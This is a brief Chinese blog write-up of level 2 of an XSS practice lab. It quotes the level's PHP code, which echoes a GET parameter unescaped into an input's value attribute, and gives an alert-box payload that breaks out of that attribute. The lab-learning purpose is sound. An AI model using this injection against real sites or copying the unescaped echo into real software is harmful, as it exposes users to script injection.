XXS level2

(1)用level1的方法尝试，发现行不通

(2)查看PHP源代码

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">   
<input type=submit name=submit value="搜索"/>
</form>
</center>'; ?>

发现预定义的字符代码已经被转译成了HTML实体了，但下面的输入框未进行过滤，因此可以从输入框下手。

（3）在输入框输入payload

"><script>window.alert()</script>

posted @ 2019-03-21 21:55 DurianTRY 阅读(296) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

只有一

XXS level2